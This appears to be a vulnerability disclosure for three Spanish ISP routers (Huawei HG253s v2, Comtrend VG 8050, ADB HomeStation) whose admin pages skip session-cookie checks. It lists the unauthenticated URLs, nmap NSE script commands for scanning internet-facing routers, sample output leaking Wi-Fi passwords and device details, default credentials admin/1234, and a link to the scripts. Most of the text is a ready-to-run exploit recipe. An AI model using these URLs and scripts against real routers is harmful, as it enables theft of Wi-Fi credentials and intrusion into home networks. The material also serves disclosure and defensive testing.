Huawei HG253s v2
Vodafone-Spain is starting to rent a new Huawei HG253v2 router to the
spanish costumers. This new router is coming with a new firmware version.
This bug has been found by @VicenDominguez

Vulnerability

Basically, it is not validating the session cookie in some administration
webpages. So, It is possible to get direct information from those urls in
any router open to internet.

http://IPhtml_253s/api/ntwk/WlanBasic
http://IP/html_253s/api/system/diagnose_internet
http://IP/html_253s/api/system/hostinfo?type=ethhost
http://IP/html_253s/api/system/hostinfo?type=guesthost
http://IP/html_253s/api/system/hostinfo?type=homehost
http://IP/html_253s/api/system/hostinfo?type=wifihost
http://IP/html_253s/api/system/wizardcfg

Usage

nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-vodafone-hua253s:
|   SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
|   Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP:
192.168.0.XX

Comtrend VG 8050

Telefonica-Spain is starting to rent a new Comtrend VG 8050 router to the
spanish costumers. This new router is coming with a new firmware version.
This bug has been found by @DaniLabs

Vulnerability

Basically, it is not validating the session cookie in some administration
webpages. So, It is possible to get direct information from those urls in
any router open to internet.

http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx

Usage

nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-comtrend-vg-8050:
|   SSID: MOVISTAR_XXX
|   Cipher Algorithm: WPA
|   Password WEP:
|   Password WPA: gTU3NkXE44RYjuM2RrxM
|   Password WPA2:
|   Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X

ADB P.DGA4001N (HomeStation)
Telefonica-Spain is starting to rent a new ADB P.DGA4001N router to the
spanish costumers. This new router is coming with a new firmware version.
This bug has been found by @DaniLabs

Vulnerability

Basically, it is not validating the session cookie in some administration
webpages. So, It is possible to get direct information from those urls in
any router open to internet.

http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx

Add the credentials by default are admin / 1234

Usage

nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-homestation:
|   SSID: WLAN_HOME
|   Cipher Algorithm: WEP
|   Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X

Here the scripts https://github.com/DaniLabs/scripts-nse